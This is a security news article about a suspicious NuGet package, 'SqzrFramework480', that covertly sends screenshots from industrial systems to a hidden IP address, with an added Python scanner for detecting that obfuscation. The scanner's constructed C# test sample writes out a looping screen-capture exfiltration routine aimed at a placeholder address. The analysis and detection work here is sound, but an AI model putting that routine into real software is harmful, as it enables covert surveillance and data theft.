
Odd NuGet package for industrial equipment raises espionage concerns

A package uploaded to NuGet, a popular open-source .NET package repository, has raised cyberespionage concerns due to its method of continuously exfiltrating screen captures from industrial equipment.

The “SqzrFramework480” package was discovered by ReversingLabs after it was flagged by the company’s Titanium Platform during researchers’ routine threat hunting procedures. ReversingLabs Threat Researcher Petar Kirhmajer published a blog post detailing the research team’s findings on Tuesday.

Uploaded by a user called “zhaoyushun1999” on Jan. 24, the package is a .NET library with a range of functions related to industrial systems such as graphical user interface (GUI) management, machine vision library configuration and robotic movement calibration.

The package appears to be geared toward developers working with equipment manufactured by a company called BOZHON Precision Industry Technology, based on the presence of BOZHON’s logo in the package’s resource header.

BOZHON Precision Industry Technology is a China-based firm that manufactures equipment in the areas of smart warehousing, smart logistics, semiconductors, electric vehicles and consumer electronics. The company’s website lists Microsoft, Samsung, Bosch, LG and Logitech among its customers.

“Open source repositories like NuGet are increasingly hosting suspicious and malicious packages designed to attract developers and trick them into downloading and incorporating malicious libraries and other modules into their development pipelines,” Kirhmajer wrote in the blog post.

“The sheer growth in such supply chain threats – which affect both open source and proprietary software ecosystems – puts the onus on development organizations to apply both caution and scrutiny to any third party code they wish to use, while also continuing to scrutinize internally developed code for potential supply chain risks,” Kirhmajer concluded.

‘SqzrFramework480’ exfiltrates screen captures every 60 seconds

Suspicion regarding the package focuses on an “Init” method included in its code, which performs a looping series of actions that appear designed to extract data from host systems without drawing attention.

The loop runs approximately every 60 seconds and involves opening a socket to connect to a remote IP, taking a screenshot of the system’s primary screen, and sending the screenshot to the remote IP via the socket.

While the ReversingLabs researchers note that there are potential legitimate applications for the function, such as continuous streaming of camera images to a remote workstation, there are additional indicators that the method is designed to remain hidden.

For example, the IP address included in the code is stored as a byte array of ASCII-encoded characters that must be converted to a string at run time using the Encoding.UTF8.GetString method, with no apparent reason why the address could not have been stored as a string literal in the first place. Keeping it as a byte array hides the address from a casual read of the decompiled code and from naive string searches.

Additionally, the “GetBytes” method that captures the screen and converts it to bytes has a non-descriptive name, and sits in a class with an equally non-descriptive name (“BinSerialize”), which makes it less than intuitive for a developer to find the method and use it for a legitimate purpose such as camera monitoring.
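The obfuscation described above, an IP address kept as a byte array and rebuilt with Encoding.UTF8.GetString, is easy to catch once you know to look for it. The following is an added example, not code from the package or from ReversingLabs: a small Python scanner that runs over decompiled C# text, finds byte[] literals, decodes them, and flags any that turn out to be a network endpoint, noting whether the code also rebuilds the value at run time and how long the loop sleeps between iterations. The C# fragment it scans is constructed for the example; the class and field names and the 192.0.2.10 address are assumptions, not the package's real values.

```python
"""Scan decompiled C# for byte-array-encoded network endpoints: an IP
address kept as a byte[] literal and rebuilt at run time with
Encoding.UTF8.GetString. Sample input is constructed for this example."""
import ipaddress
import re

# Constructed decompiled C# fragment. It mimics the pattern reported in the
# article (byte[] -> Encoding.UTF8.GetString, socket send, fixed sleep in a
# loop) but is NOT the package's code; names are invented and 192.0.2.10 is
# a documentation (TEST-NET-1) address.
SAMPLE_SOURCE = r'''
public static class BinSerialize
{
    // encoded endpoint: reads as an opaque blob, decodes to "192.0.2.10"
    private static byte[] _h = new byte[] { 0x31, 0x39, 0x32, 0x2E, 0x30, 0x2E, 0x32, 0x2E, 0x31, 0x30 };
    // harmless: a PNG magic header, also a byte[] literal, must not be flagged
    private static readonly byte[] _png = new byte[] { 137, 80, 78, 71, 13, 10, 26, 10 };

    public static void Init()
    {
        while (true)
        {
            string host = Encoding.UTF8.GetString(_h);
            var sock = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);
            sock.Connect(host, 8080);
            sock.Send(GetBytes());
            Thread.Sleep(60000);
        }
    }
}
'''

BYTE_ARRAY_RE = re.compile(
    r"byte\[\]\s+(?P<name>\w+)\s*=\s*new\s+byte\[\]\s*\{(?P<body>[^}]*)\}")
SLEEP_RE = re.compile(r"Thread\.Sleep\(\s*(?P<ms>\d+)\s*\)")


def _parse_byte_literal(token):
    """Accept both hex (0x2E) and decimal (46) C# byte literals."""
    token = token.strip()
    if token.lower().startswith("0x"):
        return int(token, 16)
    return int(token)


def extract_byte_arrays(source):
    """Return {name: bytes} for every `byte[] name = new byte[] { ... }` literal."""
    arrays = {}
    for m in BYTE_ARRAY_RE.finditer(source):
        tokens = [t for t in m.group("body").split(",") if t.strip()]
        try:
            arrays[m.group("name")] = bytes(_parse_byte_literal(t) for t in tokens)
        except ValueError:
            continue  # elements are not plain literals (e.g. computed); skip
    return arrays


def decode_printable_ascii(blob):
    """Decode bytes as ASCII text; None if any byte is not printable text."""
    try:
        text = blob.decode("ascii")
    except UnicodeDecodeError:
        return None
    return text if text and text.isprintable() else None


def looks_like_endpoint(text):
    """True for an IPv4/IPv6 literal, optionally followed by :port."""
    if text.count(":") == 1:  # "host:port" form (IPv6 has more colons)
        host, port = text.split(":")
        if port.isdigit():
            text = host
    try:
        ipaddress.ip_address(text)
        return True
    except ValueError:
        return False


def scan_source(source):
    """Flag byte[] literals that decode to a network endpoint and record
    whether the code rebuilds them at run time via Encoding.*.GetString."""
    findings = []
    for name, blob in extract_byte_arrays(source).items():
        text = decode_printable_ascii(blob)
        if text is None or not looks_like_endpoint(text):
            continue
        decode_call = (r"Encoding\.(?:UTF8|ASCII|Default)\.GetString\(\s*"
                       + re.escape(name) + r"\s*\)")
        findings.append({"name": name, "decoded": text,
                         "decoded_at_runtime": re.search(decode_call, source) is not None})
    return findings


def sleep_interval_seconds(source):
    """Largest Thread.Sleep() literal in seconds (None if absent); a fixed
    long sleep inside a loop is the beaconing cadence worth checking."""
    values = [int(m.group("ms")) for m in SLEEP_RE.finditer(source)]
    return max(values) / 1000 if values else None


if __name__ == "__main__":
    for f in scan_source(SAMPLE_SOURCE):
        print(f"{f['name']}: decodes to {f['decoded']!r} "
              f"(rebuilt at run time: {f['decoded_at_runtime']})")
    print("sleep interval (s):", sleep_interval_seconds(SAMPLE_SOURCE))
```

The scanner is deliberately narrow: it only reports a byte array when the decoded text parses as an IP literal, so ordinary binary constants such as the PNG header in the sample are ignored. Run it over output from a decompiler such as ILSpy or dnSpy; a hit that is also rebuilt with GetString and sits next to a fixed Thread.Sleep in a loop is the combination the article describes and deserves a manual look at what the loop sends.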

“The easiest explanation of what we uncovered in the SqzrFramework480 NuGet package is that this is a malicious package created to bait developers that are using Bozhon tools, who would download and run the package without noticing the suspicious GetBytes method,” Kirhmajer wrote.

However, without a “smoking gun” to say without a doubt that the package is intended to be malicious, the researchers opted not to report it to NuGet. The package was still available when the ReversingLabs blog was published on Tuesday, but no longer appeared on the NuGet site by Thursday.

ReversingLabs confirmed to SC Media Thursday afternoon that the package appeared to have been taken down. SC Media reached out to Microsoft, which maintains the NuGet repository, to ask whether the package was removed by staff or by its original creator and did not receive a response.

The package was downloaded more than 2,400 times before it disappeared from the site, according to ReversingLabs.

China-backed supply chain attacks a major concern

The package’s discovery comes amid heightened tensions over China nation-state cyberespionage, with U.S. government officials taking several actions to address security concerns related to hardware and software sourced from China.

Last month, President Joe Biden issued an executive order that included measures for the U.S. Coast Guard to direct cyber risk management actions with regard to ship-to-shore cranes manufactured in China. The U.S. Department of Commerce also launched an investigation last month into national security risks posed by connected vehicles made in China and other “countries of concern.”

Earlier this month, the U.S. House of Representatives approved an act that would require the popular video-sharing app TikTok to divest from its Chinese parent company ByteDance in order to continue operations in the U.S., due to fears that ByteDance could share data on millions of U.S. citizens with the Chinese government.

China state-affiliated threat actors have leveraged the software supply chain in their cyberattack campaigns before, with a report by ESET published in early March revealing that the threat actor “Evasive Panda” compromised the website of a Tibetan language translation software developer to deploy malicious downloaders.

The ReversingLabs blog states the researchers reached out to BOZHON to ask whether the NuGet account that uploaded the package was affiliated with the company or any of its employees. ReversingLabs told SC Media Thursday that they had not yet heard a response back from the company.
